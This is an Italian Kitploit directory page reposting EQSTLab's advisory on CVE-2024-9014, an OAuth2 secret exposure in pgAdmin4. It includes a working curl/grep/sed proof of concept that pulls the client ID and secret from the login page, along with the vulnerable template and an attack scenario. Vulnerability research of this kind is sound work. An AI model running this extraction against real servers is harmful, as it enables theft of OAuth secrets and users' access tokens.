Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-9014 — Esposizione di Informazioni Sensibili di Pgadmin4 | Kitploit
Strumenti/GitHubGitHub/eqstlab/cve-2024-9014
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration TestingApprendimento e Formazione
GitHubeqstlab/cve-2024-9014

CVE-2024-9014

Esposizione di Informazioni Sensibili di Pgadmin4

Vedi Repository
811 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Questo post è un articolo di ricerca pubblicato da EQSTLab.

CVE-2024-9014

★ CVE-2024-9014 PoC di Esposizione di Informazioni Sensibili ★

Descrizione

CVE-2024-9014 : Esposizione di Informazioni Sensibili in pgAdmin4

descrizione: le versioni di pgAdmin 8.11 e precedenti sono vulnerabili a un difetto di sicurezza nell'autenticazione OAuth2. Questa vulnerabilità consente a un attaccante di ottenere potenzialmente il client ID e il client secret, portando ad accesso non autorizzato ai dati dell'utente.

PoC

Comando

root@kitploit:~
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

Esempio

root@kitploit:~
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

Output

pgadmin4-8.9 e pgadmin4-8.12 alt text

Analisi

Punto vulnerabile (pgadmin/templates/security/login_user.html)

A questo punto, la variabile config.OAUTH2_CONFIG restituisce i file di configurazione OAUTH2 includendo OAUTH2_CLIENT_ID e OAUTH2_CLIENT_SECRET.

root@kitploit:~
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
    'userLanguage': user_language,
    'langOptions': ns.langOptions,
    'forgotPassUrl': url_for('browser.forgot_password'),
    'loginUrl': url_for('authenticate.login'),
    'csrfToken': csrf_token(),
    'authSources': config.AUTHENTICATION_SOURCES,
    'authSourcesEnum': {
        'OAUTH2': config.OAUTH2,
        'KERBEROS': config.KERBEROS,
    },
    'oauth2Config': config.OAUTH2_CONFIG,
    'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}


Patch

alt text

Scenario

Compromissione di informazioni private

Identificare e proteggere i parametri OAuth segreti è molto importante. Mentre “client_id” può essere divulgato in sicurezza, divulgare “client_secret” comporta un rischio significativo. Se il client_secret viene compromesso, un attaccante può sfruttare l'identità e la fiducia dell'applicazione per rubare il “access token” dell'utente e le informazioni personali.

Disclaimer

Questo repository non è inteso per esporre informazioni sensibili relative a CVE-2024-9014. Lo scopo di questo progetto è aiutare le persone a conoscere questa vulnerabilità e, forse, testare le proprie applicazioni.

EQST Insight

Pubblichiamo analisi di CVE e malware una volta al mese. Se sei interessato, segui i link qui sotto per consultare le nostre pubblicazioni. https://www.skshieldus.com/eng/business/insight.do

Riferimento

https://nvd.nist.gov/vuln/detail/CVE-2024-9014

Scarica lo strumento